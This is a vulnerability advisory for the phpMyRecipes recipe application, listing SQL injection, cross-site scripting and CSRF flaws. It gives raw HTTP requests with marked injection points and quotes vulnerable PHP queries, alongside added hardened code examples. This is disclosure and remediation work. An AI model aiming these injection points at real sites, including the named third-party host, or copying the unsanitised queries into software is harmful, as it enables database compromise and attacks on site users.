#Product: phpMyRecipes version 1.x.x
#Vulnerability: Multiple SQL Injection, XSS and CSRF Vulnerabilities
#Impact: High
#Authors: Rafay Baloch And Sikandar Ali
#Company: RHAinfoSEC
#Website: http://rhainfosec.com

Introduction
============

"PhpMyRecipes is a simple application for storing and retrieving recipes.
It uses a web-based interface, for ease of use across any system, and a
MySQL database backend for storing the recipes."

Description
===========

We performed both white-box and black-box testing of phpMyRecipes and
found a large number of high-risk vulnerabilities.

The application is poorly coded from a security perspective: it has no
input filtering mechanism at all that would separate normal input from
malicious input.

Vulnerabilities
===============

Several high-risk vulnerabilities, including SQL injection and XSS, were
discovered. We have provided the vulnerable code for some of the
vulnerabilities. Full details have been sent to the vendor so that they
may apply patches accordingly.


Multiple Cross Site Scripting Vulnerabilities
=============================================

Multiple XSS vulnerabilities were found: user input was not sanitised
before it was returned to the user. It is advised to filter all special
characters before displaying the input back to the user.
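As an added example (not code from phpMyRecipes or from this advisory's authors), the following shows the reflected-output pattern the advisory reports beside its fixed form, where the fix is HTML output encoding at the point the value is echoed, and type validation for parameters that are really numbers. The function names and the sample input are this example's own assumptions.

```php
<?php
// Added example for this advisory, not code from phpMyRecipes: output
// encoding as the control for reflected XSS. Function names and the
// sample input are constructed for illustration.

// Encode a value for safe insertion into HTML text or a quoted attribute.
function html_encode(string $value): string
{
    // ENT_QUOTES covers both ' and " (attribute contexts); ENT_SUBSTITUTE
    // replaces invalid UTF-8 rather than returning an empty string, which
    // would otherwise silently blank the output.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (the shape the advisory reports): the raw value of a
// request parameter is echoed straight into the page as markup.
function render_name_vulnerable(string $name): string
{
    return '<td>' . $name . '</td>';
}

// Hardened pattern: the same value, encoded at the point of output, so
// any tags or quotes in it are displayed literally instead of parsed.
function render_name_hardened(string $name): string
{
    return '<td>' . html_encode($name) . '</td>';
}

// For a parameter that is really a number (such as "from" in
// ingredients.php) validation comes first and the submitted text is
// never echoed at all; only the validated integer reaches the page.
function render_from_hardened(string $from): string
{
    $offset = ctype_digit($from) ? (int) $from : 0;
    return '<a href="ingredients.php?from=' . $offset . '">Next page</a>';
}

// Constructed sample input: markup inside a free-text field.
$sample = 'Pad Thai <b>"injected"</b>';

echo render_name_vulnerable($sample), "\n";   // browser parses the <b> tag
echo render_name_hardened($sample), "\n";     // tag and quotes shown as text
echo render_from_hardened('12abc'), "\n";     // non-numeric offset falls back to 0
```

Encoding belongs at output time rather than at input time: the same stored value may later be placed in HTML text, an attribute, or a JSON response, and each context needs its own encoding. Stripping characters on input, as the advisory's wording suggests, also loses legitimate data such as an apostrophe in a name.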

Details and PoCs
================

1) http://target.com?r_id=[XSS]

2) http://target.com/ingredients/ingredients.php?from=[XSS]

3) http://target.com/login.php

REQUEST
=======

POST /login.php HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=Uname&username=[XSS]


4) http://recipes.delattre.ca/domenusearch.php

REQUEST
=======

POST /domenusearch.php HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: Target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

r_acategory[]=5[XSS]&r_arecipes[]=0&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=2

All Post Parameters were found vulnerable to XSS.

5) http://target.com/register.php


REQUEST
=======

POST /register.php HTTP/1.1
Content-Length: 158
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=aa@gmail.com[XSS]&name=XSS&password1=XSS&password2=XSS&username=XSS


#Note: All parameters were found vulnerable to Cross Site Scripting.



Multiple SQL Injection Vulnerabilities
======================================

Multiple SQL injection vulnerabilities were identified. User input is
inserted directly into the SQL queries without any sanitisation or
filtering.


1) http://target.com/dosearch.php

POST DATA
=========

categories[]=1[Inject_HERE]&ingids[]=20&ing_modifier=2&name_exact=riuciyda&words_all=1&words_any=1&words_exact=1&words_without=1


2) http://target.com/ingredients/ingredients.php?from=[INJECT_HERE]


Vulnerable Code
===============

  if (! empty($_POST['from'])) {
    $db_start = $_POST['from'];        // raw request value, never validated
  } elseif (! empty($_GET['from'])) {
    $db_start = $_GET['from'];
  } else {
    $db_start = 0;
  }


<TABLE BORDER=3 WIDTH=100%>
  <TR>
    <TH WIDTH=85%>Ingredient</TH>
    <TH COLSPAN=2>Actions</TH>
  </TR>
<?php

    // $db_start is interpolated straight into the LIMIT clause
    if ($result = mysql_query("SELECT id,name from ingredients ORDER BY name LIMIT $db_start, " . INGREDIENTS_PER_PAGE)) {
      while ($row = mysql_fetch_array($result)) {
?>


3) http://target.com/recipes/textrecipe.php?r_id=[INJECT_HERE]

Vulnerable Code
===============

Line 37 - 42


  # Get the recipe ID to view
  $r_id = $_GET['r_id'];

  // $r_id is interpolated unquoted into the WHERE clause
  if (! ($result = mysql_query("SELECT name FROM recipes WHERE id=$r_id"))) {
    dberror("textrecipe.php", "Cannot select recipe");
  }
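As an added example (not code from phpMyRecipes or from this advisory's authors), the two queries shown above rewritten so that the request value can never change the query's structure: the paging offset is validated as a non-negative integer and bound as an integer, and the recipe id is passed as a prepared-statement parameter. It assumes a PDO connection to the same `ingredients` and `recipes` tables, reuses the `INGREDIENTS_PER_PAGE` constant and `dberror()` helper from the original code, and the function names are this example's own.

```php
<?php
// Added example for this advisory, not phpMyRecipes code: hardened versions
// of the ingredients.php and textrecipe.php queries. Assumes a PDO
// connection to the same schema; function names are constructed here.

// Placeholder page size so the example runs stand-alone; the real
// application defines this constant itself.
defined('INGREDIENTS_PER_PAGE') || define('INGREDIENTS_PER_PAGE', 20);

// Paging offset: the value is an integer, so the control is type
// enforcement. filter_var() returns false for anything that is not a
// plain non-negative integer, including any text with SQL in it.
function page_offset(array $post, array $get): int
{
    $raw = $post['from'] ?? $get['from'] ?? '0';
    $offset = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $offset === false ? 0 : $offset;
}

function list_ingredients(PDO $db, int $offset): array
{
    // With emulated prepares, values passed to execute() are quoted as
    // strings, which MySQL rejects in LIMIT; binding with PDO::PARAM_INT
    // keeps them numeric on either prepare mode.
    $stmt = $db->prepare('SELECT id, name FROM ingredients ORDER BY name LIMIT :offset, :count');
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->bindValue(':count', INGREDIENTS_PER_PAGE, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Recipe lookup: the id travels as a statement parameter, never as part
// of the SQL text, so the original "WHERE id=$r_id" interpolation is gone.
function recipe_name(PDO $db, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;            // malformed id: no query is issued at all
    }
    $stmt = $db->prepare('SELECT name FROM recipes WHERE id = ?');
    $stmt->execute([$id]);
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Usage in the shape of the original textrecipe.php (connection details
// are placeholders):
//
//   $db = new PDO('mysql:host=localhost;dbname=recipes;charset=utf8mb4', $user, $pass, [
//       PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//       PDO::ATTR_EMULATE_PREPARES => false,   // use server-side prepared statements
//   ]);
//   $name = recipe_name($db, $_GET['r_id'] ?? '');
//   if ($name === null) {
//       dberror("textrecipe.php", "Cannot select recipe");
//   }
//   $rows = list_ingredients($db, page_offset($_POST, $_GET));
```

Validation and parameterisation are deliberately both present: the integer check rejects bad input early with a clean error, while the prepared statement is the control that holds even if a later change lets a string reach the query. The legacy `mysql_*` functions used by the original code have no parameter binding and are removed in PHP 7, so moving to PDO or mysqli is part of the fix rather than optional.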


4) http://target.com/

REQUEST
=======

POST /domenutext.php HTTP/1.1
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

0=1&1=1&2=1&3=1&4=1&5=1&6=1&7=1&8=1&r_acategory[]=17&r_arecipes[]=[INJECT_HERE]&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=3


5) http://target.com/dosearch.php

REQUEST
=======

POST /dosearch.php HTTP/1.1
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

categories[]=[INJECT_HERE]&ingids[]=20&ing_modifier=2&name_exact=aaaaaaa&words_all=1&words_any=1&words_exact=1&words_without=1


Multiple CSRF Vulnerabilities
=============================

All forms were missing CSRF tokens, including some of the important ones.
This would have allowed an attacker to force the victim's browser into
submitting a request which, in turn, could be used to manipulate important
details such as the e-mail address or username. In our analysis we found
no CSRF tokens that would distinguish a legitimate request sent by the
user from one that an attacker forced the victim's browser to send.
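As an added example (not code from phpMyRecipes or from this advisory's authors), the synchroniser-token pattern that gives the application exactly what the paragraph above says it lacks: a per-session secret that is embedded in every state-changing form and checked before the handler writes anything. It assumes PHP sessions are in use; the function and field names are this example's own.

```php
<?php
// Added example for this advisory, not phpMyRecipes code: a synchroniser
// token CSRF control for forms such as register.php or a profile/e-mail
// change page. Assumes PHP sessions; names are constructed for illustration.

// Issue one random token per session and reuse it until the session ends.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG; hex-encoded so it is safe in a form field
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside every <form> that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Check in every POST handler before any database write. A cross-site
// page cannot read the victim's session token, so it cannot supply it.
function csrf_check(array $post): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time so the token does not leak
    // through response timing; the is_string guard rejects csrf_token[]=...
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Usage in a handler behind a form such as the e-mail change the advisory
// mentions (the update itself is elided):
//
//   if ($_SERVER['REQUEST_METHOD'] === 'POST') {
//       if (!csrf_check($_POST)) {
//           http_response_code(403);
//           exit('Request rejected: missing or invalid CSRF token');
//       }
//       // ... apply the change ...
//   }
//
// and in the form template:
//
//   <form method="post" action="profile.php">
//     <?= csrf_field() ?>
//     ...
//   </form>
```

Two points matter in deployment: every state-changing action must use POST and be checked, since a GET handler that modifies data bypasses the form entirely; and the session cookie should additionally carry `SameSite=Lax` or `Strict` (settable through `session_set_cookie_params()` on PHP 7.3 and later) so that most cross-site submissions never carry the session in the first place. The token remains the primary control, because `SameSite` depends on browser behaviour the server cannot verify.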